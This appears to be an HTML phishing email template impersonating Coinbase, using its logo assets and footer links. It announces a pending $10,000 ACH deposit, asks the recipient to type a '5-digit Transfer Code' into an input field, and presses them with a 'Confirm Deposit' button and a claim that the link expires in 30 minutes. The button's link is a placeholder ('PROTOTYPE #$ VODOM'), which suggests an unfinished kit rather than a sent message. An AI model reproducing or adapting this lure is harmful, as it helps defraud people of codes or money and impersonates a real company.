<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Coinbase</title> 
</head>


<body style="!important background-color: #F2F5F7; height: 100% !important; margin: 0; padding: 0; width: 100% !important;" bgcolor="#F2F5F7">
  <!-- HIDDEN PREHEADER TEXT -->
  <div style="color: #fefefe; display: none; font-family: Open Sans, Helvetica, Arial, sans-serif; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden;">
      Coinbase makes cryptocurrency easy!
  </div>

  <table id="main" width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
    <tbody>
      <tr>
        <td valign="top" align="center" bgcolor="#0052FF" style="background: #0052FF; padding: 0 15px;">
          <table class="innermain" cellpadding="0" width="100%" cellspacing="0" border="0" align="center" style="margin:0 auto; table-layout: fixed; border-collapse: collapse !important; max-width: 600px;">
            <tbody>
            <!-- START of MAIL Content -->
              <tr>
                <td align="center" valign="top" width="100%">

                <!-- Logo start here -->
                  <table class="logo" width="100%" cellpadding="0" cellspacing="0" border="0">
                    <tbody>
                      <tr><td align="center" valign="top" style="-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%; mso-table-lspace: 0pt; mso-table-rspace: 0pt; padding: 30px 0;">
                        <img alt="Coinbase" width="150" src="https://static-assets.coinbase.com/email/coinbase-transactional-wordmark-white.png" />
                      </td></tr>
                    </tbody>
                  </table>
                <!-- Logo end here -->

                <!-- Main CONTENT -->
                  <table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff" style="border-radius: 4px; box-shadow: 0 2px 8px rgba(0,0,0,0.05);">
                    <tbody>
                      
                      <tr>
                        <td height="40"></td>
                      </tr>
                      <tr style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color:#4E5C6E; font-size:14px; line-height:20px; margin-top:20px;">
                        <td class="content" colspan="2" valign="top" align="center" style="padding-left:40px; padding-right:40px;">

                          <table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff">
  <tbody>
  <tr>
  <td align="center" valign="bottom" colspan="2" cellpadding="3">
   <img alt="Coinbase" width="80" src="https://www.coinbase.com/assets/app/icon-user-cac648866d61a107335863c84d72bac7659e35844366e0429e85c9ee960d10ef.png" />
  </td>
</tr>

<tr><td height="20" &nbsp;=""></td></tr>


  <tr>
    <td align="center">
        <span style="color:#48545d;font-size:22px;line-height: 24px;">
          Please Confirm ACH Deposit
        </span>
    </td>
  </tr>

  <tr><td height="24" &nbsp;=""></td></tr>
<tr>
  <td height="1" bgcolor="#DAE1E9"></td>
</tr>

<tr><td height="24" &nbsp;=""></td></tr>


  <tr>
    <td align="center" style="color:#48545d;font-size:14px;line-height:24px;">
        <span style="color:#48545d;font-size:14px;line-height:24px;">
          <p>You have pending Deposit of $10,000.00 from 538***********9 to your coinbase account</p>
          <h4>Please insert 5 digit Transfer Code from sender. You will not be able to confirm deposit from the Coinbase App.</h4>
          <strong>Enter ACH Transfer Code:</strong>
</label>          <input type="text" name="token" id="token" pattern="\d*" title="This field must only contain digits" maxlength="5" autocomplete="off" placeholder="5-digit code" />
        </span>
    </td>
  </tr>

  <tr><td height="20" &nbsp;=""></td></tr>
  <tr>
    <td align="center" style="color:#48545d;font-size:14px;line-height:24px;">
          <span style="color:#48545d;font-size:14px;line-height:24px;">
            <a
  href="PROTOTYPE #$ VODOM"
  style="display:block; font-size: 16px; padding:15px 25px; background-color:#0052FF; color:#ffffff; border-radius:4px; text-decoration:none; text-align:center; font-weight:400;")
>
  Confirm Deposit
</a>

          </span>
    </td>
  </tr>
  <tr><td height="24" &nbsp;=""></td></tr>
<tr>
  <td height="1" bgcolor="#DAE1E9"></td>
</tr>

<tr><td height="24" &nbsp;=""></td></tr>


  <tr>
    <td align="center" style="color:#48545d;font-size:14px;line-height:24px;">
        <span style="color:#48545d;font-size:14px;line-height:24px;">
         Confirmation link expiers in 30 minutes...
        </span>
    </td>
  </tr>
  </tbody>
</table>

                        </td>
                      </tr>
                      <tr>
                        <td height="40"></td>
                      </tr>
                    </tbody>
                  </table>
                <!-- Main CONTENT end here -->

                <!-- PROMO column start here -->
                    <!-- Show mobile promo 75% of the time -->
                    <table id="promo" width="100%" cellpadding="0" cellspacing="0" border="0" style="margin-top:20px;" >
                      <tbody>
                        <tr>
                          <td colspan="2" height="20"></td>
                        </tr>
                        <tr>
                          <td colspan="2" align="center">
                            <span style="font-size:14px; font-weight:400; margin-bottom:10px; color: #fefefe; font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif;">Get the latest Coinbase App for your phone</span>
                          </td>
                        </tr>
                        <tr>
                          <td colspan="2" height="20"></td>
                        </tr>
                        <tr>
                          <td valign="top" width="50%" align="right">
                            <a href="https://control.kochava.com/v1/cpi/click?campaign_id=kocoinbase-ios552533b683779d4454e56c90a0&network_id=2426&device_id=device_id&site_id=1" style="display:inline-block;margin-right:10px;">
                              <img src="https://s3.amazonaws.com/app-public/Coinbase-email/iOS_app.png" height="40" border="0" alt="Coinbase iOS mobile bitcoin wallet">
                            </a>
                          </td>
                          <td valign="top">
                            <a href="https://control.kochava.com/v1/cpi/click?campaign_id=kocoinbase----production553ec3be25c1308daf2a5d2791&network_id=2426&device_id=device_id&site_id=1&append_app_conv_trk_params=1" style="display:inline-block;margin-left:5px;">
                              <img src="https://s3.amazonaws.com/app-public/Coinbase-email/Android_app.png" height="40" border="0" alt="Coinbase Android mobile bitcoin wallet" style="height:40 !important">
                            </a>
                          </td>
                        </tr>
                        <tr>
                          <td colspan="2" height="20"></td>
                        </tr>
                      </tbody>
                    </table>

                <!-- PROMO column end here -->

                <!-- FOOTER start here -->
                  <table width="100%" cellpadding="0" cellspacing="0" border="0">
                    <tbody>
                      <tr>
                        <td height="10">&nbsp;</td>
                      </tr>
                      <tr>
                        <td valign="top" align="center">
                          <span style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #fefefe; font-size:10px; margin-bottom:5px; display:block;">
                            <a href="https://www.coinbase.com/legal/user_agreement?country=US" target="_blank" tabindex="-1" style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #fefefe; font-size:10px; margin-bottom:5px; display:block;text-decoration:underline;">Terms of Service</a>
                          </span>
                        </td>
                      </tr>
                      <tr>
                        <td valign="top" align="center">
                          <span style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #fefefe; font-size:10px;">&copy;
                            <a href="https://www.coinbase.com/" target="_blank" style="color: #fefefe !important; text-decoration:none;">Coinbase</a> 2021
                          </span>
                        </td>
                      </tr>
                      <tr>
                        <td height="50">&nbsp;</td>
                      </tr>
                    </tbody>
                  </table>
                <!-- FOOTER end here -->
                </td>
              </tr>
            </tbody>
          </table>
        </td>
      </tr>
    </tbody>
  </table>
</body>
</html>